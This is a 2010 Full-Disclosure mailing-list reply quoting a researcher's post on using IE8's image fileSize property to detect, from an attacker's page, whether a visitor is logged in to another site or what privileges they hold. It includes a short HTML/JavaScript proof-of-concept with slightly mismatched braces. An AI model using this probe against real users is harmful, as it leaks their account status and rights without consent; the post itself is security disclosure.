It could be used as a technique for defeating the login images used as "two-factor-authentication" by some online services. The application of using filesize to fingerprint an image is somewhat novel. This is a decidedly 'old' vector, though.
-Travis 2010/4/21 Владимир Воронцов <[email protected]> > Hello Full disclosure! > > Once again, unwinding theme HiJacking found a fun way to get the very > least information about the target resource when the user is located at the > attacker. > > Already crocked <img> tag opens new opportunities using the method > fileSize, described here: http://msdn.microsoft.com/en-us/library/ms533752 > (v = VS.85). Aspx > > Consider a simple example - a Web application after authentication > provides some sort of picture for the user, for example: > > http://example.com/getImage.php?image=myAvatar > > The attacker, knowing this can create a page to read: > > <img id="onsec" src="http://example.com/getImage.php?image=myAvatar";> > > <input type="button" onclick="if (onsec.fileSize> 0) (alert ('authorized > on example.com') else (alert ('not authorized on example.com')}"> > > Thus, the attacker learns the simplest case, whether the target user > access to example.com. > > Continuing the theme, I want to note that in some cases, can obtain > additional information from the very values of the size of the picture. It > can be any logical information Web applications, say, the same script can > show administrators a picture of the same size, and users - of another. > Thus, we obtain the user rights. And so on. > > I'd like to return the size of the method is not only "valid" images, but > also HTML pages, JSON, etc. But, unfortunately, does not work. Maybe, of > course, there are exceptions, call to investigate the matter. > > I have some thoughts on the study of vector images in XML format, because > HTML is often valid XML, and then ... > > Check for the test version IE9, but he did not support SVG inside tag > <img>, but only as a separate tag. > > Works in IE8, in Opera 10.52 does not work on check writing, if not > difficult. > > Original at russian language: http://oxod.ru/?p=113 > > -- > Best regards, > Vladimir Vorontsov > ONsec security expert > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on http://pastebin.com/f6fd606da
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
